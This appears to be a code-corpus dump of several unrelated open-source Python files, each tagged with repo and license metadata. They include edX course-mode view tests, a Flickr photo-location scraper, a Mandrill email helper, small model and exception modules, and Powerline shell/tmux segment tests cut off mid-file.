packages=find_packages('src'),
package_dir={'': 'src'},
include_package_data=True,
zip_safe=False,
scripts=[
"bin/wa_kat_server.py",
"bin/wa_kat_build_conspects.py",
"bin/wa_kat_structured_logger.py",
"bin/wa_kat_build_keyword_index.py",
],
install_requires=open("requirements.txt").read().splitlines(),
extras_require={
"test": [
"pytest",
],
"docs": [
"sphinx",
"sphinxcontrib-napoleon",
]
}
)
| WebArchivCZ/WA-KAT | setup.py | Python | mit | 1,679 |
import unittest
import decimal
import ddt
from mock import patch
from django.conf import settings
from django.test.utils import override_settings
from django.core.urlresolvers import reverse
from xmodule.modulestore.tests.django_utils import (
ModuleStoreTestCase, mixed_store_config
)
from util.testing import UrlResetMixin
from xmodule.modulestore.tests.factories import CourseFactory
from course_modes.tests.factories import CourseModeFactory
from student.tests.factories import CourseEnrollmentFactory, UserFactory
from student.models import CourseEnrollment
from course_modes.models import CourseMode, Mode
# Since we don't need any XML course fixtures, use a modulestore configuration
# that disables the XML modulestore.
MODULESTORE_CONFIG = mixed_store_config(settings.COMMON_TEST_DATA_ROOT, {}, include_xml=False)
@ddt.ddt
@override_settings(MODULESTORE=MODULESTORE_CONFIG)
@unittest.skipUnless(settings.ROOT_URLCONF == 'lms.urls', 'Test only valid in lms')
class CourseModeViewTest(UrlResetMixin, ModuleStoreTestCase):
@patch.dict(settings.FEATURES, {'MODE_CREATION_FOR_TESTING': True})
def setUp(self):
super(CourseModeViewTest, self).setUp('course_modes.urls')
self.course = CourseFactory.create()
self.user = UserFactory.create(username="Bob", email="bob@example.com", password="edx")
self.client.login(username=self.user.username, password="edx")
@unittest.skipUnless(settings.ROOT_URLCONF == 'lms.urls', 'Test only valid in lms')
@ddt.data(
# is_active?, enrollment_mode, redirect?
(True, 'verified', True),
(True, 'honor', False),
(True, 'audit', False),
(False, 'verified', False),
(False, 'honor', False),
(False, 'audit', False),
(False, None, False),
)
@ddt.unpack
def test_redirect_to_dashboard(self, is_active, enrollment_mode, redirect):
# Create the course modes
for mode in ('audit', 'honor', 'verified'):
CourseModeFactory(mode_slug=mode, course_id=self.course.id)
# Enroll the user in the test course
if enrollment_mode is not None:
CourseEnrollmentFactory(
is_active=is_active,
mode=enrollment_mode,
course_id=self.course.id,
user=self.user
)
# Configure whether we're upgrading or not
url = reverse('course_modes_choose', args=[unicode(self.course.id)])
response = self.client.get(url)
# Check whether we were correctly redirected
if redirect:
self.assertRedirects(response, reverse('dashboard'))
else:
self.assertEquals(response.status_code, 200)
def test_upgrade_copy(self):
# Create the course modes
for mode in ('audit', 'honor', 'verified'):
CourseModeFactory(mode_slug=mode, course_id=self.course.id)
url = reverse('course_modes_choose', args=[unicode(self.course.id)])
response = self.client.get(url, {"upgrade": True})
# Verify that the upgrade copy is displayed instead
# of the usual text.
self.assertContains(response, "Upgrade Your Enrollment")
def test_no_enrollment(self):
# Create the course modes
for mode in ('audit', 'honor', 'verified'):
CourseModeFactory(mode_slug=mode, course_id=self.course.id)
# User visits the track selection page directly without ever enrolling
url = reverse('course_modes_choose', args=[unicode(self.course.id)])
response = self.client.get(url)
self.assertEquals(response.status_code, 200)
@ddt.data(
'',
'1,,2',
'1, ,2',
'1, 2, 3'
)
def test_suggested_prices(self, price_list):
# Create the course modes
for mode in ('audit', 'honor'):
CourseModeFactory(mode_slug=mode, course_id=self.course.id)
CourseModeFactory(
mode_slug='verified',
course_id=self.course.id,
suggested_prices=price_list
)
# Enroll the user in the test course to emulate
# automatic enrollment
CourseEnrollmentFactory(
is_active=True,
course_id=self.course.id,
user=self.user
)
# Verify that the prices render correctly
response = self.client.get(
reverse('course_modes_choose', args=[unicode(self.course.id)]),
follow=False,
)
self.assertEquals(response.status_code, 200)
# TODO: Fix it so that response.templates works w/ mako templates, and then assert
# that the right template rendered
def test_professional_enrollment(self):
# The only course mode is professional ed
CourseModeFactory(mode_slug='professional', course_id=self.course.id)
# Go to the "choose your track" page
choose_track_url = reverse('course_modes_choose', args=[unicode(self.course.id)])
response = self.client.get(choose_track_url)
# Expect that we're redirected immediately to the "show requirements" page
# (since the only available track is professional ed)
show_reqs_url = reverse('verify_student_show_requirements', args=[unicode(self.course.id)])
self.assertRedirects(response, show_reqs_url)
# Now enroll in the course
CourseEnrollmentFactory(
user=self.user,
is_active=True,
mode="professional",
course_id=unicode(self.course.id),
)
# Expect that this time we're redirected to the dashboard (since we're already registered)
response = self.client.get(choose_track_url)
self.assertRedirects(response, reverse('dashboard'))
# Mapping of course modes to the POST parameters sent
# when the user chooses that mode.
POST_PARAMS_FOR_COURSE_MODE = {
'honor': {'honor_mode': True},
'verified': {'verified_mode': True, 'contribution': '1.23'},
'unsupported': {'unsupported_mode': True},
}
@ddt.data(
('honor', 'dashboard'),
('verified', 'show_requirements'),
)
@ddt.unpack
def test_choose_mode_redirect(self, course_mode, expected_redirect):
# Create the course modes
for mode in ('audit', 'honor', 'verified'):
CourseModeFactory(mode_slug=mode, course_id=self.course.id)
# Choose the mode (POST request)
choose_track_url = reverse('course_modes_choose', args=[unicode(self.course.id)])
response = self.client.post(choose_track_url, self.POST_PARAMS_FOR_COURSE_MODE[course_mode])
# Verify the redirect
if expected_redirect == 'dashboard':
redirect_url = reverse('dashboard')
elif expected_redirect == 'show_requirements':
redirect_url = reverse(
'verify_student_show_requirements',
kwargs={'course_id': unicode(self.course.id)}
) + "?upgrade=False"
else:
self.fail("Must provide a valid redirect URL name")
self.assertRedirects(response, redirect_url)
def test_remember_donation_for_course(self):
# Create the course modes
for mode in ('honor', 'verified'):
CourseModeFactory(mode_slug=mode, course_id=self.course.id)
# Choose the mode (POST request)
choose_track_url = reverse('course_modes_choose', args=[unicode(self.course.id)])
self.client.post(choose_track_url, self.POST_PARAMS_FOR_COURSE_MODE['verified'])
# Expect that the contribution amount is stored in the user's session
self.assertIn('donation_for_course', self.client.session)
self.assertIn(unicode(self.course.id), self.client.session['donation_for_course'])
actual_amount = self.client.session['donation_for_course'][unicode(self.course.id)]
expected_amount = decimal.Decimal(self.POST_PARAMS_FOR_COURSE_MODE['verified']['contribution'])
self.assertEqual(actual_amount, expected_amount)
def test_successful_honor_enrollment(self):
# Create the course modes
for mode in ('honor', 'verified'):
CourseModeFactory(mode_slug=mode, course_id=self.course.id)
# Enroll the user in the default mode (honor) to emulate
# automatic enrollment
params = {
'enrollment_action': 'enroll',
'course_id': unicode(self.course.id)
}
self.client.post(reverse('change_enrollment'), params)
# Explicitly select the honor mode (POST request)
choose_track_url = reverse('course_modes_choose', args=[unicode(self.course.id)])
self.client.post(choose_track_url, self.POST_PARAMS_FOR_COURSE_MODE['honor'])
# Verify that the user's enrollment remains unchanged
mode, is_active = CourseEnrollment.enrollment_mode_for_user(self.user, self.course.id)
self.assertEqual(mode, 'honor')
self.assertEqual(is_active, True)
def test_unsupported_enrollment_mode_failure(self):
# Create the supported course modes
for mode in ('honor', 'verified'):
CourseModeFactory(mode_slug=mode, course_id=self.course.id)
# Choose an unsupported mode (POST request)
choose_track_url = reverse('course_modes_choose', args=[unicode(self.course.id)])
response = self.client.post(choose_track_url, self.POST_PARAMS_FOR_COURSE_MODE['unsupported'])
self.assertEqual(400, response.status_code)
@unittest.skipUnless(settings.ROOT_URLCONF == 'lms.urls', 'Test only valid in lms')
def test_default_mode_creation(self):
# Hit the mode creation endpoint with no querystring params, to create an honor mode
url = reverse('create_mode', args=[unicode(self.course.id)])
response = self.client.get(url)
self.assertEquals(response.status_code, 200)
expected_mode = [Mode(u'honor', u'Honor Code Certificate', 0, '', 'usd', None, None)]
course_mode = CourseMode.modes_for_course(self.course.id)
self.assertEquals(course_mode, expected_mode)
@unittest.skipUnless(settings.ROOT_URLCONF == 'lms.urls', 'Test only valid in lms')
@ddt.data(
(u'verified', u'Verified Certificate', 10, '10,20,30', 'usd'),
(u'professional', u'Professional Education', 100, '100,200', 'usd'),
)
@ddt.unpack
def test_verified_mode_creation(self, mode_slug, mode_display_name, min_price, suggested_prices, currency):
parameters = {}
parameters['mode_slug'] = mode_slug
parameters['mode_display_name'] = mode_display_name
parameters['min_price'] = min_price
parameters['suggested_prices'] = suggested_prices
parameters['currency'] = currency
url = reverse('create_mode', args=[unicode(self.course.id)])
response = self.client.get(url, parameters)
self.assertEquals(response.status_code, 200)
expected_mode = [Mode(mode_slug, mode_display_name, min_price, suggested_prices, currency, None, None)]
course_mode = CourseMode.modes_for_course(self.course.id)
self.assertEquals(course_mode, expected_mode)
@unittest.skipUnless(settings.ROOT_URLCONF == 'lms.urls', 'Test only valid in lms')
def test_multiple_mode_creation(self):
# Create an honor mode
base_url = reverse('create_mode', args=[unicode(self.course.id)])
self.client.get(base_url)
# Excluding the currency parameter implicitly tests the mode creation endpoint's ability to
# use default values when parameters are partially missing.
parameters = {}
parameters['mode_slug'] = u'verified'
parameters['mode_display_name'] = u'Verified Certificate'
parameters['min_price'] = 10
parameters['suggested_prices'] = '10,20'
# Create a verified mode
url = reverse('create_mode', args=[unicode(self.course.id)])
response = self.client.get(url, parameters)
honor_mode = Mode(u'honor', u'Honor Code Certificate', 0, '', 'usd', None, None)
verified_mode = Mode(u'verified', u'Verified Certificate', 10, '10,20', 'usd', None, None)
expected_modes = [honor_mode, verified_mode]
course_modes = CourseMode.modes_for_course(self.course.id)
self.assertEquals(course_modes, expected_modes)
| olexiim/edx-platform | common/djangoapps/course_modes/tests/test_views.py | Python | agpl-3.0 | 12,383 |
import flickrapi
import json
import csv
from datetime import date, timedelta
api_key = 'API-KEY'
api_secret = 'SECRET-KEY'
csv_path = 'flickr_helsinki.csv'
class Image:
def __init__(self, photo_id, lat, lon):
self.photo_id = photo_id
self.lat = lat
self.lon = lon
self.url = ''
def setImageUrl(self, url):
self.url = url
flickr = flickrapi.FlickrAPI(api_key, api_secret)
bbox = '24.899319,60.150223,24.986683,60.177915'
photos = []
count = 0
d = date.today() - timedelta(days=90)
#first get a count
print('Working...')
for photo in flickr.walk(tag_mode='all',bbox=bbox, min_taken_date=d, extras='geo'):
count = count+1
if count%10 == 0:
print '.',
print('\n' + str(count) + ' images found, processing...')
count = 1
for photo in flickr.walk(tag_mode='all', bbox=bbox, min_taken_date=d, extras='geo'):
print(str(count)),
count = count+1
img = Image(photo.get('id'), photo.get('latitude'), photo.get('longitude'))
# construct url
img.setImageUrl('https://farm' + photo.get('farm') + '.staticflickr.com/' + photo.get('server') + '/' + photo.get('id') + '_' + photo.get('secret') + '_z.jpg')
photos.append(img)
print('Writing to csv')
# output to csv
with open(csv_path, 'w') as csvfile:
fieldnames = ['photo_id', 'lat', 'lon', 'url']
wr = csv.DictWriter(csvfile, fieldnames=fieldnames, quoting=csv.QUOTE_NONNUMERIC, lineterminator='\n')
wr.writeheader()
for photo in photos:
wr.writerow({'photo_id': photo.photo_id, 'lat': photo.lat, 'lon': photo.lon, 'url': photo.url})
| jlevente/link-vgi | workshop/case_study/flickr.py | Python | gpl-3.0 | 1,576 |
import mandrill
import os
import logging
import jinja2
from totalimpactwebapp.testing import is_test_email
logger = logging.getLogger("ti.emailer")
def send(address, subject, template_name, context):
if is_test_email(address):
return False
templateLoader = jinja2.FileSystemLoader(searchpath="totalimpactwebapp/templates")
templateEnv = jinja2.Environment(loader=templateLoader)
html_template = templateEnv.get_template(template_name + ".html")
html_to_send = html_template.render(context)
mailer = mandrill.Mandrill(os.getenv("MANDRILL_APIKEY"))
addressee = {"email": address}
try:
addressee["name"] = context["name"]
except KeyError:
pass
msg = {
"html": html_to_send,
"subject": subject,
"from_email": "team@impactstory.org",
"from_name": "The Impactstory team",
"to": [addressee], # must be a list
"track_opens": True,
"track_clicks": True
}
try:
msg["tags"] = context["tags"]
except KeyError:
pass
mailer.messages.send(msg)
logger.info(u"Sent an email to " + address)
return msg
| Impactstory/total-impact-webapp | emailer.py | Python | mit | 1,160 |
# Copyright 2018 WolkAbout Technology s.r.o.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
ActuatorStatus Module.
"""
class ActuatorStatus:
"""Current status of an actuator."""
def __init__(self, reference, state, value):
"""
Information about actuator status.
:param reference: Reference of the actuator
:type reference: str
:param state: Actuators current state
:type state: wolk.models.ActuatorState.ActuatorState
:param value: Actuators current value
:type value: int or float or str
"""
self.reference = reference
self.state = state
self.value = value
| Wolkabout/WolkConnect-Python- | wolk/models/ActuatorStatus.py | Python | apache-2.0 | 1,190 |
from wikipediabase.util import get_article
def sort_by_length(*args):
key = lambda a: len(' '.join(get_article(a).paragraphs()))
return sorted(args, reverse=True, key=key)
def sort_named(named, *args):
# TODO: clean up, this was directly translated from Ruby WikipediaBase
article_lengths = {}
for a in args:
try:
article_lengths[a] = len(' '.join(get_article(a).paragraphs()))
except LookupError:
pass
def compare(a, b):
named_eq = lambda x: x == named
named_ieq = lambda x: x.lower() == named.lower()
if named_eq(a) != named_eq(b):
return -1 if named_eq(a) else 1
elif named_ieq(a) != named_ieq(b):
return -1 if named_ieq(a) else 1
else:
len_a = article_lengths[a]
len_b = article_lengths[b]
if len_a < len_b: return -1
elif len_a == len_b: return 0
elif len_a > len_b: return 1
return sorted(article_lengths.keys(), cmp=compare)
| fakedrake/WikipediaBase | wikipediabase/sort_symbols.py | Python | apache-2.0 | 1,035 |
# -*- coding: utf-8 -*-
#
# This file is part of EUDAT B2Share.
# Copyright (C) 2016 CERN.
#
# B2Share is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# B2Share is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with B2Share; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
"""B2Share Communities exceptions."""
from __future__ import absolute_import
from invenio_rest.errors import RESTException
class InvalidCommunityError(Exception):
"""Exception raised when a community is invalid."""
pass
class CommunityDoesNotExistError(Exception):
"""Exception raised when a requested community does not exist."""
pass
class CommunityDeletedError(Exception):
"""Exception raised when a requested community is marked as deleted."""
pass
class InvalidPublicationStateError(RESTException):
"""Exception raised when a deposit is an invalid publication state."""
code = 400
"""HTTP Status code."""
class NotACommunityRoleError(RESTException):
"""Exception raised a role does not belong to a community."""
code = 400
description = 'This role doesn\'t belong to any community.'
| emanueldima/b2share | b2share/modules/communities/errors.py | Python | gpl-2.0 | 1,826 |
# vim:fileencoding=utf-8:noet
from __future__ import (unicode_literals, division, absolute_import, print_function)
import sys
import os
from functools import partial
from collections import namedtuple
from time import sleep
from powerline.segments import shell, tmux, pdb, i3wm
from powerline.lib.vcs import get_fallback_create_watcher
from powerline.lib.unicode import out_u
import tests.vim as vim_module
from tests.lib import Args, urllib_read, replace_attr, new_module, replace_module_module, replace_env, Pl
from tests import TestCase, SkipTest
def get_dummy_guess(**kwargs):
if 'directory' in kwargs:
def guess(path, create_watcher):
return Args(branch=lambda: out_u(os.path.basename(path)), **kwargs)
else:
def guess(path, create_watcher):
return Args(branch=lambda: out_u(os.path.basename(path)), directory=path, **kwargs)
return guess
class TestShell(TestCase):
def test_last_status(self):
pl = Pl()
segment_info = {'args': Args(last_exit_code=10)}
self.assertEqual(shell.last_status(pl=pl, segment_info=segment_info), [
{'contents': '10', 'highlight_groups': ['exit_fail']}
])
segment_info['args'].last_exit_code = 0
self.assertEqual(shell.last_status(pl=pl, segment_info=segment_info), None)
segment_info['args'].last_exit_code = None
self.assertEqual(shell.last_status(pl=pl, segment_info=segment_info), None)
segment_info['args'].last_exit_code = 'sigsegv'
self.assertEqual(shell.last_status(pl=pl, segment_info=segment_info), [
{'contents': 'sigsegv', 'highlight_groups': ['exit_fail']}
])
segment_info['args'].last_exit_code = 'sigsegv+core'
self.assertEqual(shell.last_status(pl=pl, segment_info=segment_info), [
{'contents': 'sigsegv+core', 'highlight_groups': ['exit_fail']}
])
def test_last_pipe_status(self):
pl = Pl()
segment_info = {'args': Args(last_pipe_status=[])}
self.assertEqual(shell.last_pipe_status(pl=pl, segment_info=segment_info), None)
segment_info['args'].last_pipe_status = [0, 0, 0]
self.assertEqual(shell.last_pipe_status(pl=pl, segment_info=segment_info), None)
segment_info['args'].last_pipe_status = [0, 2, 0]
self.assertEqual(shell.last_pipe_status(pl=pl, segment_info=segment_info), [
{'contents': '0', 'highlight_groups': ['exit_success'], 'draw_inner_divider': True},
{'contents': '2', 'highlight_groups': ['exit_fail'], 'draw_inner_divider': True},
{'contents': '0', 'highlight_groups': ['exit_success'], 'draw_inner_divider': True}
])
segment_info['args'].last_pipe_status = [0, 'sigsegv', 'sigsegv+core']
self.assertEqual(shell.last_pipe_status(pl=pl, segment_info=segment_info), [
{'contents': '0', 'highlight_groups': ['exit_success'], 'draw_inner_divider': True},
{'contents': 'sigsegv', 'highlight_groups': ['exit_fail'], 'draw_inner_divider': True},
{'contents': 'sigsegv+core', 'highlight_groups': ['exit_fail'], 'draw_inner_divider': True}
])
segment_info['args'].last_pipe_status = [0, 'sigsegv', 0]
self.assertEqual(shell.last_pipe_status(pl=pl, segment_info=segment_info), [
{'contents': '0', 'highlight_groups': ['exit_success'], 'draw_inner_divider': True},
{'contents': 'sigsegv', 'highlight_groups': ['exit_fail'], 'draw_inner_divider': True},
{'contents': '0', 'highlight_groups': ['exit_success'], 'draw_inner_divider': True}
])
segment_info['args'].last_pipe_status = [0, 'sigsegv+core', 0]
self.assertEqual(shell.last_pipe_status(pl=pl, segment_info=segment_info), [
{'contents': '0', 'highlight_groups': ['exit_success'], 'draw_inner_divider': True},
{'contents': 'sigsegv+core', 'highlight_groups': ['exit_fail'], 'draw_inner_divider': True},
{'contents': '0', 'highlight_groups': ['exit_success'], 'draw_inner_divider': True}
])
def test_jobnum(self):
pl = Pl()
segment_info = {'args': Args(jobnum=0)}
self.assertEqual(shell.jobnum(pl=pl, segment_info=segment_info), None)
self.assertEqual(shell.jobnum(pl=pl, segment_info=segment_info, show_zero=False), None)
self.assertEqual(shell.jobnum(pl=pl, segment_info=segment_info, show_zero=True), '0')
segment_info = {'args': Args(jobnum=1)}
self.assertEqual(shell.jobnum(pl=pl, segment_info=segment_info), '1')
self.assertEqual(shell.jobnum(pl=pl, segment_info=segment_info, show_zero=False), '1')
self.assertEqual(shell.jobnum(pl=pl, segment_info=segment_info, show_zero=True), '1')
def test_continuation(self):
pl = Pl()
self.assertEqual(shell.continuation(pl=pl, segment_info={}), [{
'contents': '',
'width': 'auto',
'highlight_groups': ['continuation:current', 'continuation'],
}])
segment_info = {'parser_state': 'if cmdsubst'}
self.assertEqual(shell.continuation(pl=pl, segment_info=segment_info), [
{
'contents': 'if',
'draw_inner_divider': True,
'highlight_groups': ['continuation:current', 'continuation'],
'width': 'auto',
'align': 'l',
},
])
self.assertEqual(shell.continuation(pl=pl, segment_info=segment_info, right_align=True), [
{
'contents': 'if',
'draw_inner_divider': True,
'highlight_groups': ['continuation:current', 'continuation'],
'width': 'auto',
'align': 'r',
},
])
self.assertEqual(shell.continuation(pl=pl, segment_info=segment_info, omit_cmdsubst=False), [
{
'contents': 'if',
'draw_inner_divider': True,
'highlight_groups': ['continuation'],
},
{
'contents': 'cmdsubst',
'draw_inner_divider': True,
'highlight_groups': ['continuation:current', 'continuation'],
'width': 'auto',
'align': 'l',
},
])
self.assertEqual(shell.continuation(pl=pl, segment_info=segment_info, omit_cmdsubst=False, right_align=True), [
{
'contents': 'if',
'draw_inner_divider': True,
'highlight_groups': ['continuation'],
'width': 'auto',
'align': 'r',
},
{
'contents': 'cmdsubst',
'draw_inner_divider': True,
'highlight_groups': ['continuation:current', 'continuation'],
},
])
self.assertEqual(shell.continuation(pl=pl, segment_info=segment_info, omit_cmdsubst=True, right_align=True), [
{
'contents': 'if',
'draw_inner_divider': True,
'highlight_groups': ['continuation:current', 'continuation'],
'width': 'auto',
'align': 'r',
},
])
self.assertEqual(shell.continuation(pl=pl, segment_info=segment_info, omit_cmdsubst=True, right_align=True, renames={'if': 'IF'}), [
{
'contents': 'IF',
'draw_inner_divider': True,
'highlight_groups': ['continuation:current', 'continuation'],
'width': 'auto',
'align': 'r',
},
])
self.assertEqual(shell.continuation(pl=pl, segment_info=segment_info, omit_cmdsubst=True, right_align=True, renames={'if': None}), [
{
'contents': '',
'highlight_groups': ['continuation:current', 'continuation'],
'width': 'auto',
'align': 'r',
},
])
segment_info = {'parser_state': 'then then then cmdsubst'}
self.assertEqual(shell.continuation(pl=pl, segment_info=segment_info), [
{
'contents': 'then',
'draw_inner_divider': True,
'highlight_groups': ['continuation'],
},
{
'contents': 'then',
'draw_inner_divider': True,
'highlight_groups': ['continuation'],
},
{
'contents': 'then',
'draw_inner_divider': True,
'highlight_groups': ['continuation:current', 'continuation'],
'width': 'auto',
'align': 'l',
},
])
def test_cwd(self):
new_os = new_module('os', path=os.path, sep='/')
pl = Pl()
cwd = [None]
def getcwd():
wd = cwd[0]
if isinstance(wd, Exception):
raise wd
else:
return wd
segment_info = {'getcwd': getcwd, 'home': None}
with replace_attr(shell, 'os', new_os):
cwd[0] = '/abc/def/ghi/foo/bar'
self.assertEqual(shell.cwd(pl=pl, segment_info=segment_info), [
{'contents': '/', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
{'contents': 'abc', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
{'contents': 'def', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
{'contents': 'ghi', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
{'contents': 'foo', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
{'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True, 'highlight_groups': ['cwd:current_folder', 'cwd']},
])
segment_info['home'] = '/abc/def/ghi'
self.assertEqual(shell.cwd(pl=pl, segment_info=segment_info), [
{'contents': '~', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
{'contents': 'foo', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
{'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True, 'highlight_groups': ['cwd:current_folder', 'cwd']},
])
segment_info.update(shortened_path='~foo/ghi')
self.assertEqual(shell.cwd(pl=pl, segment_info=segment_info), [
{'contents': '~foo', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
{'contents': 'ghi', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True, 'highlight_groups': ['cwd:current_folder', 'cwd']},
])
self.assertEqual(shell.cwd(pl=pl, segment_info=segment_info, use_shortened_path=False), [
{'contents': '~', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
{'contents': 'foo', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
{'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True, 'highlight_groups': ['cwd:current_folder', 'cwd']},
])
segment_info.pop('shortened_path')
self.assertEqual(shell.cwd(pl=pl, segment_info=segment_info, dir_limit_depth=3), [
{'contents': '~', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
{'contents': 'foo', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
{'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True, 'highlight_groups': ['cwd:current_folder', 'cwd']}
])
self.assertEqual(shell.cwd(pl=pl, segment_info=segment_info, dir_limit_depth=3, shorten_home=False), [
{'contents': '...', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
{'contents': 'ghi', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
{'contents': 'foo', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
{'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True, 'highlight_groups': ['cwd:current_folder', 'cwd']}
])
self.assertEqual(shell.cwd(pl=pl, segment_info=segment_info, dir_limit_depth=1), [
{'contents': '...', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
{'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True, 'highlight_groups': ['cwd:current_folder', 'cwd']}
])
self.assertEqual(shell.cwd(pl=pl, segment_info=segment_info, dir_limit_depth=1, ellipsis='---'), [
{'contents': '---', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
{'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True, 'highlight_groups': ['cwd:current_folder', 'cwd']}
])
self.assertEqual(shell.cwd(pl=pl, segment_info=segment_info, dir_limit_depth=1, ellipsis=None), [
{'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True, 'highlight_groups': ['cwd:current_folder', 'cwd']}
])
self.assertEqual(shell.cwd(pl=pl, segment_info=segment_info, dir_limit_depth=1, use_path_separator=True), [
{'contents': '.../', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': False},
{'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': False, 'highlight_groups': ['cwd:current_folder', 'cwd']}
])
self.assertEqual(shell.cwd(pl=pl, segment_info=segment_info, dir_limit_depth=1, use_path_separator=True, ellipsis='---'), [
{'contents': '---/', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': False},
{'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': False, 'highlight_groups': ['cwd:current_folder', 'cwd']}
])
self.assertEqual(shell.cwd(pl=pl, segment_info=segment_info, dir_limit_depth=1, use_path_separator=True, ellipsis=None), [
{'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': False, 'highlight_groups': ['cwd:current_folder', 'cwd']}
])
self.assertEqual(shell.cwd(pl=pl, segment_info=segment_info, dir_limit_depth=2, dir_shorten_len=2), [
{'contents': '~', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
{'contents': 'fo', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
{'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True, 'highlight_groups': ['cwd:current_folder', 'cwd']}
])
self.assertEqual(shell.cwd(pl=pl, segment_info=segment_info, dir_limit_depth=2, dir_shorten_len=2, use_path_separator=True), [
{'contents': '~/', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': False},
{'contents': 'fo/', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': False},
{'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': False, 'highlight_groups': ['cwd:current_folder', 'cwd']}
])
cwd[0] = '/etc'
self.assertEqual(shell.cwd(pl=pl, segment_info=segment_info, use_path_separator=False), [
{'contents': '/', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
{'contents': 'etc', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True, 'highlight_groups': ['cwd:current_folder', 'cwd']},
])
self.assertEqual(shell.cwd(pl=pl, segment_info=segment_info, use_path_separator=True), [
{'contents': '/', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': False},
{'contents': 'etc', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': False, 'highlight_groups': ['cwd:current_folder', 'cwd']},
])
cwd[0] = '/'
self.assertEqual(shell.cwd(pl=pl, segment_info=segment_info, use_path_separator=False), [
{'contents': '/', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True, 'highlight_groups': ['cwd:current_folder', 'cwd']},
])
self.assertEqual(shell.cwd(pl=pl, segment_info=segment_info, use_path_separator=True), [
{'contents': '/', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': False, 'highlight_groups': ['cwd:current_folder', 'cwd']},
])
ose = OSError()
ose.errno = 2
cwd[0] = ose
self.assertEqual(shell.cwd(pl=pl, segment_info=segment_info, dir_limit_depth=2, dir_shorten_len=2), [
{'contents': '[not found]', 'divider_highlight_group': 'cwd:divider', 'highlight_groups': ['cwd:current_folder', 'cwd'], 'draw_inner_divider': True}
])
cwd[0] = OSError()
self.assertRaises(OSError, shell.cwd, pl=pl, segment_info=segment_info, dir_limit_depth=2, dir_shorten_len=2)
cwd[0] = ValueError()
self.assertRaises(ValueError, shell.cwd, pl=pl, segment_info=segment_info, dir_limit_depth=2, dir_shorten_len=2)
class TestTmux(TestCase):
def test_attached_clients(self):
def get_tmux_output(pl, cmd, *args):
if cmd == 'list-panes':
return 'session_name\n'
elif cmd == 'list-clients':
return '/dev/pts/2: 0 [191x51 xterm-256color] (utf8)\n/dev/pts/3: 0 [191x51 xterm-256color] (utf8)'
pl = Pl()
with replace_attr(tmux, 'get_tmux_output', get_tmux_output):
self.assertEqual(tmux.attached_clients(pl=pl), '2')
self.assertEqual(tmux.attached_clients(pl=pl, minimum=3), None)
class TestCommon(TestCase):
@classmethod
def setUpClass(cls):
module = __import__(str('powerline.segments.common.{0}'.format(cls.module_name)))
cls.module = getattr(module.segments.common, str(cls.module_name))
class TestNet(TestCommon):
module_name = 'net'
def test_hostname(self):
pl = Pl()
with replace_env('SSH_CLIENT', '192.168.0.12 40921 22') as segment_info:
with replace_module_module(self.module, 'socket', gethostname=lambda: 'abc'):
self.assertEqual(self.module.hostname(pl=pl, segment_info=segment_info), 'abc')
